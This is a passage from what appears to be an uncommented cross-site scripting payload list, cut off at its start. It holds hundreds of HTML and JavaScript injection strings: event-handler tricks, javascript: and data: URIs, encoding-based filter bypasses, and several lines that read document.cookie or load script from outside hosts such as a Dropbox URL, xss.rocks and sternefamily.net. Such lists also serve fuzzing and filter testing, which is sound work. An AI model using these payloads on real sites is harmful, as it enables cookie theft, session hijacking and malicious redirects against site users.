ondragstart="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondrop="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onscroll="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x oncopy="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x oncut="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onpaste="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onabort="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x oncanplay="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x oncanplaythrough="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x oncuechange="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ondurationchange="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onemptied="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onended="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onloadeddata="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onloadedmetadata="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onloadstart="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onpause="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onplay="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onplaying="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onprogress="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onratechange="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onseeked="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onseeking="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onstalled="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onsuspend="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ontimeupdate="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onvolumechange="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onwaiting="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onshow="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x ontoggle="alert(String.fromCharCode(88,83,83))"> <META onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1)"; <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> <INPUT TYPE="BUTTON" action="alert('XSS')"/>
">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123
">
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123
<IFRAME SRC="javascript:alert('XSS');"></IFRAME> <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
">
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123
"></iframe><script>alert(`TEXT YOU WANT TO BE DISPLAYED`);</script><iframe frameborder="0%EF%BB%BF
">
<IFRAME width="420" height="315" SRC=" frameborder="0" onmouseover="alert(document.cookie)"></IFRAME>123
">
<iframe width="420" height="315" src=" frameborder="0" allowfullscreen></iframe>123
>
<IFRAME width="420" height="315" frameborder="0" onmouseover="document.location.href='https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZr g'"></IFRAME>Hover the cursor to the LEFT of this Message
&ParamHeight=250
<IFRAME width="420" height="315" frameborder="0" onload="alert(document.cookie)"></IFRAME>
">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123
">
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123
<iframe src=http://xss.rocks/scriptlet.html < <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> <iframe src=" javascript:prompt(1) "> <svg><style>{font-family:'<iframe/onload=confirm(1)>' <input/onmouseover="javaSCRIPT:confirm(1)" <sVg><scRipt >alert(1) {Opera} <img/src=`` onerror=this.onerror=confirm(1) <form><isindex formaction="javascript:confirm(1)" <img src=`` onerror=alert(1) <script/ src='https://dl.dropbox.com/u/13018058/js.js' / ></script> <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? <iframe/src="data:text/html; base64 ,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> <script /**/>/**/alert(1)/**/</script /**/
">
<iframe/src="data:text/html,<svg onload=alert(1)>">
<meta content="
1
; JAVASCRIPT: alert(1)" http-equiv="refresh"/>
<svg><script xlink:href=data:,window.open('https://www.google.com/') </script
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">
<iframe src=javascript:alert(document.location)>
<form><a href="javascript:\u0061lert(1)">X</script><img/*/src="worksinchrome:prompt(1)"/*/onerror='eval(src)'>
<img/
 src=`~` onerror=prompt(1)>
<form><iframe
 src="javascript:alert(1)"
;>
<a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="
>X</a
http://www.google<script .com>alert(document.location)</script
<a href=[�]"� onmouseover=prompt(1)//">XYZ</a
<img/src=@ onerror = prompt('1')
<style/onload=prompt('XSS')
<script ^__^>alert(String.fromCharCode(49))</script ^__^
</style ><script :-(>/**/alert(document.location)/**/</script :-(
�</form><input type="date" onfocus="alert(1)">
<form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'>
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
<iframe srcdoc='<body onload=prompt(1)>'>
<a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a>
<script Loveme5454 (talk)>alert(0%0)</script Loveme5454 (talk)>
<style/onload=<!-- >
alert
(1)>
<///style///>SPAN
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover= prompt(1)
"><svg><style>{-o-link-source:'<body/onload=confirm(1)>'
<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}
<marquee onstart='javascript:alert(1)'>^__^
X {IE7}
<iframe// src=javaSCRIPT:alert(1)
//<form/action=javascript:alert(document.cookie)><input/type='submit'>//
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>
//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\
/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'/</style>
<a/href="javascript: javascript:prompt(1)"><input type="X">
</plaintext\></|\><plaintext/onmouseover=prompt(1)
</svg><svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}
<a href="javascript:\u0061le%72t(1)"><button>
DIV
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
<a href="jAvAsCrIpT:alert(1)">X</a>
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
On Mouse Over
<a href=javascript:alert(document.cookie)>Click Here</a>
<img src="/" =_=" title="onerror='prompt(1)'">
<%
<script src="data:text/javascript,alert(1)"></script>
<iframe/src \/\/onload = prompt(1)
<iframe/onreadystatechange=alert(1)
<svg/onload=alert(1)
<input value=<><iframe/src=javascript:confirm(1)
<input type="text" value=`` X
http://www.<script>alert(1)</script .com
<iframe src=j
a
v
a
s
c
r
i
p
t
:a
l
e
r
t
28
1
%29></iframe>
<svg><script ?>alert(1)
<iframe src=j a v a s c r i p t :a l e r t %28 1 %29></iframe>
<img src=`xx:xx`onerror=alert(1)>
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>
<meta http-equiv="refresh" content="0;javascript:alert(1)"/>
<math><a xlink:href="//jsfiddle.net/t846h/">click
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
<svg contentScriptType=text/vbs><script>MsgBox+1
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script
<object data=javascript:\u0061le%72t(1)>
<script>+-+-1-+-+alert(1)</script>
<body/onload=<!-->
alert(1)>
<script itworksinallbrowsers>/*<script* */alert(1)</script
<img src ?itworksonchrome?\/onerror = alert(1)
<svg><script>//
confirm(1);</script </svg>
<svg><script onlypossibleinopera:-)> alert(1)
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
<script x> alert(1) </script 1=2
style="x:">
<--`<img/src=` onerror=alert(1)> --!>
<script/src=data:text/javascript,alert(1)></script>
x</button>
"><img src=x onerror=window.open('https://www.google.com/');>
<form><button formaction=javascript:alert(1)>CLICKME
<math><a xlink:href="//jsfiddle.net/t846h/">click
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
<a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a>
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
<audio src=1 href=1 onerror="javascript:alert(1)"></audio>
<video src=1 href=1 onerror="javascript:alert(1)"></video>
<body src=1 href=1 onerror="javascript:alert(1)"></body>
<image src=1 href=1 onerror="javascript:alert(1)"></image>
<object src=1 href=1 onerror="javascript:alert(1)"></object>
<script src=1 href=1 onerror="javascript:alert(1)"></script>
<svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize>
<title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange>
<iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad>
<body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter>
<body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus>
<frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll>
<script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange>
<html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp>
<body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange>
<svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad>
<body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide>
<body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver>
<body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload>
<body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad>
<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange>
<html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave>
<html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel>
<style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad>
<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange>
<body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow>
<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange>
<frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus>
<applet onError applet onError="javascript:javascript:alert(1)"></applet onError>
<marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart>
<script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad>
<html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver>
<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter>
<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload>
<html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown>
<marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll>
<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange>
<frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur>
<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange>
<svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload>
<html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut>
<body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove>
<body onResize body onResize="javascript:javascript:alert(1)"></body onResize>
<object onError object onError="javascript:javascript:alert(1)"></object onError>
<body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState>
<html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove>
<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange>
<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide>
<svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload>
<applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror>
<body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup>
<body onunload body onunload="javascript:javascript:alert(1)"></body onunload>
<iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload>
<body onload body onload="javascript:javascript:alert(1)"></body onload>
<html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover>
<object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload>
<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload>
<body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus>
<body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown>
<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload>
<iframe src iframe src="javascript:javascript:alert(1)"></iframe src>
<svg onload svg onload="javascript:javascript:alert(1)"></svg onload>
<html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove>
<body onblur body onblur="javascript:javascript:alert(1)"></body onblur>
\x3Cscript>javascript:alert(1)</script>
'"`><script>/* *\x2Fjavascript:alert(1)// */</script>
<script>javascript:alert(1)</script\x0D
<script>javascript:alert(1)</script\x0A
<script>javascript:alert(1)</script\x0B
<script charset="\x22>javascript:alert(1)</script>
--> <img src=xxx:x onerror=javascript:alert(1)> -->
-->
-->
-->
`"'><img src='#\x27 onerror=javascript:alert(1)>
<a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a>
"'`><svg><script>a='hello\x27;javascript:alert(1)//';</script>
<a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a>
<script>/* *\x2A/javascript:alert(1)// */</script>
<script>/* *\x00/javascript:alert(1)// */</script>
<style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style>
<style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style>
<style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style>
<style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style>
<style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style>
"'`>ABCDEF
"'`>ABCDEF
<script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script>
<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script>
<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)>
"'`><\x00img src=xxx:x onerror=javascript:alert(1)>
<script src="data:text/plain\x2Cjavascript:alert(1)"></script>
<script src="data:\xD4\x8F,javascript:alert(1)"></script>
<script src="data:\xE0\xA4\x98,javascript:alert(1)"></script>
<script src="data:\xCB\x8F,javascript:alert(1)"></script>
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a>
`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)>
`"'><img src=xxx:x \x22onerror=javascript:alert(1)>
`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)>
`"'><img src=xxx:x \x0Donerror=javascript:alert(1)>
`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)>
`"'><img src=xxx:x \x09onerror=javascript:alert(1)>
`"'><img src=xxx:x \x0Conerror=javascript:alert(1)>
`"'><img src=xxx:x \x00onerror=javascript:alert(1)>
`"'><img src=xxx:x \x27onerror=javascript:alert(1)>
`"'><img src=xxx:x \x20onerror=javascript:alert(1)>
"`'><script>\x3Bjavascript:alert(1)</script>
"`'><script>\x0Djavascript:alert(1)</script>
"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script>
"`'><script>\xE2\x80\x81javascript:alert(1)</script>
"`'><script>\xE2\x80\x84javascript:alert(1)</script>
"`'><script>\xE3\x80\x80javascript:alert(1)</script>
"`'><script>\x09javascript:alert(1)</script>
"`'><script>\xE2\x80\x89javascript:alert(1)</script>
"`'><script>\xE2\x80\x85javascript:alert(1)</script>
"`'><script>\xE2\x80\x88javascript:alert(1)</script>
"`'><script>\x00javascript:alert(1)</script>
"`'><script>\xE2\x80\xA8javascript:alert(1)</script>
"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script>
"`'><script>\xE1\x9A\x80javascript:alert(1)</script>
"`'><script>\x0Cjavascript:alert(1)</script>
"`'><script>\x2Bjavascript:alert(1)</script>
"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script>
"`'><script>-javascript:alert(1)</script>
"`'><script>\x0Ajavascript:alert(1)</script>
"`'><script>\xE2\x80\xAFjavascript:alert(1)</script>
"`'><script>\x7Ejavascript:alert(1)</script>
"`'><script>\xE2\x80\x87javascript:alert(1)</script>
"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script>
"`'><script>\xE2\x80\xA9javascript:alert(1)</script>
"`'><script>\xC2\x85javascript:alert(1)</script>
"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script>
"`'><script>\xE2\x80\x83javascript:alert(1)</script>
"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script>
"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script>
"`'><script>\xE2\x80\x80javascript:alert(1)</script>
"`'><script>\x21javascript:alert(1)</script>
"`'><script>\xE2\x80\x82javascript:alert(1)</script>
"`'><script>\xE2\x80\x86javascript:alert(1)</script>
"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script>
"`'><script>\x0Bjavascript:alert(1)</script>
"`'><script>\x20javascript:alert(1)</script>
"`'><script>\xC2\xA0javascript:alert(1)</script>
"/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x />
"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x />
"/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x />
"/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x />
"/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x />
"/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x />
"/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x />
"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x />
"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x />
<script\x2F>javascript:alert(1)</script>
<script\x20>javascript:alert(1)</script>
<script\x0D>javascript:alert(1)</script>
<script\x0A>javascript:alert(1)</script>
<script\x0C>javascript:alert(1)</script>
<script\x00>javascript:alert(1)</script>
<script\x09>javascript:alert(1)</script>
"><img src=x onerror=javascript:alert(1)>
"><img src=x onerror=javascript:alert('1')>
"><img src=x onerror=javascript:alert("1")>
"><img src=x onerror=javascript:alert(`1`)>
"><img src=x onerror=javascript:alert(('1'))>
"><img src=x onerror=javascript:alert(("1"))>
"><img src=x onerror=javascript:alert((`1`))>
"><img src=x onerror=javascript:alert(A)>
"><img src=x onerror=javascript:alert((A))>
"><img src=x onerror=javascript:alert(('A'))>
"><img src=x onerror=javascript:alert('A')>
"><img src=x onerror=javascript:alert(("A"))>
"><img src=x onerror=javascript:alert("A")>
"><img src=x onerror=javascript:alert((`A`))>
"><img src=x onerror=javascript:alert(`A`)>
`"'><img src=xxx:x onerror\x0B=javascript:alert(1)>
`"'><img src=xxx:x onerror\x00=javascript:alert(1)>
`"'><img src=xxx:x onerror\x0C=javascript:alert(1)>
`"'><img src=xxx:x onerror\x0D=javascript:alert(1)>
`"'><img src=xxx:x onerror\x20=javascript:alert(1)>
`"'><img src=xxx:x onerror\x0A=javascript:alert(1)>
`"'><img src=xxx:x onerror\x09=javascript:alert(1)>
<script>javascript:alert(1)<\x00/script>
<img src=# onerror\x3D"javascript:alert(1)" >
<input onfocus=javascript:alert(1) autofocus>
<input onblur=javascript:alert(1) autofocus><input autofocus>
<video poster=javascript:javascript:alert(1)//
<body onscroll=javascript:alert(1)>
...
...
...
...
...
<input autofocus>
<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X
<video><source onerror="javascript:javascript:alert(1)">
<video onerror="javascript:javascript:alert(1)"><source>
<form><button formaction="javascript:javascript:alert(1)">X
<body oninput=javascript:alert(1)><input autofocus>
<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://google.com" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>
<frameset onload=javascript:alert(1)>
<img src=x onerror=javascript:alert(1)//">
<comment><img src="</comment><img src=x onerror=javascript:alert(1))//">
<![><img src="]><img src=x onerror=javascript:alert(1)//">
<style><img src="</style><img src=x onerror=javascript:alert(1)//">
<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body>
<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>
<object data="data:text/html;base64,%(base64)s">
<embed src="data:text/html;base64,%(base64)s">
<b <script>alert(1)</script>0
<input value="``onmouseover=javascript:alert(1)"> <script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>
<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'>
<embed src="javascript:alert(1)">
<img src="javascript:alert(1)">
<image src="javascript:alert(1)">
<script src="javascript:alert(1)">
x
<? foo="><script>javascript:alert(1)</script>">
<! foo="><script>javascript:alert(1)</script>">
</ foo="><script>javascript:alert(1)</script>">
<? foo="><x foo='?><script>javascript:alert(1)</script>'>">
<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>">
<% foo><x foo="%><script>javascript:alert(1)</script>">
<x xmlns="><iframe onload=javascript:alert(1)"> <script>d.innerHTML=d.innerHTML</script>
<img \x00src=x onerror="alert(1)">
<img \x47src=x onerror="javascript:alert(1)">
<img \x11src=x onerror="javascript:alert(1)">
<img \x12src=x onerror="javascript:alert(1)">
<img\x47src=x onerror="javascript:alert(1)">
<img\x10src=x onerror="javascript:alert(1)">
